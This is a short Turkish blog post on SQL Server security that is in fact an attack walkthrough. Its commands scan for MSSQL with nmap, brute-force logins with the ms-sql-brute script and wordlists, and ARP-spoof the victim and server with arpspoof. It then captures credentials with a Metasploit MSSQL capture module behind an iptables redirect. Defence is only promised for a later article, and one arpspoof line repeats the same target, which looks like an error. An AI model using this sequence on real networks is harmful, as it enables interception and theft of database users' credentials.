Sql Server’da Güvenlik


Sql Server’da Güvenlik

 

Microsoft SQL Server 1433 numaralı port üzerinden çalışır. Bazı yazılımcılar farklı portlar kullanabilirler. Eğer diğer portları bulmak istiyorsanız NMAP‘i(Güvenlik tarayıcısı) kullanabilirsiniz. Örnek verecek olursak;


$ nmap -n <“IP”> -p “PORT” (Bu kod ile port üzerindeki server hakkında bilgi alınabilir)

$ nmap -p “PORT” –script ms-sql-info <“IP”> (Detaylı Bilgi Almak için kullanılır)

$ nmap -p <PORT> –script ms-sql-brute –script-args mssql.instance-all,userdb=wordlist.txt,passdb=wordlist.txt <“IP”>  (Ip’deki server’a ait account bilgilerine sahipr olmak gerekmektedir bu şekilde user ve password’e ulaşılabilinir.)

$ echo 1 > /proc/sys/net/ipv4/ip_forward (Ip Yönlendirmesi yapıyoruz, Kali Linux işletim sisteminde bulunan “arpspoof” ile hedef ve sunucu arasına girilmiş oldu. )

 Sırası ile yapınız



$ arpspoof -i eth0 -t <SQL SERVER IP> <“Kurban IP”>

$ arpspoof -i eth0 -t <“Saldırı Yapılacak IP”> <“Saldırı Yapılacak IP”>

$ use auxiliary/server/capture/mssql

$ set SRVPORT “PORT”

$ iptables -t nat -A PREROUTING -p tcp -d 192.168.48.130 –dport “PORT” -j REDIRECT –to-ports “PORT” (Saldırılan hesap bilgilerini girdiğinde yazılım hesap bilgilerini yakalayıp bize verecek ve saldırdığımız Server’a kullanıcı giriş yapmak istediğinde Additional Information hatası alacak )


Diğer makalemde size daha detaylı DB Saldırılarını bunun önüne nasıl geçebileceğinizi ve database’inizi nasıl koruyacağınızı anlatacağım Esen kalın.

 

 

Sql Server’da Güvenlik

Giriş Yap

Hoşgeldin, sefa getirdin :)

Şifre Sıfırla

Şifreni bidaha unutma lütfen :)

Geri git :
Giriş Yap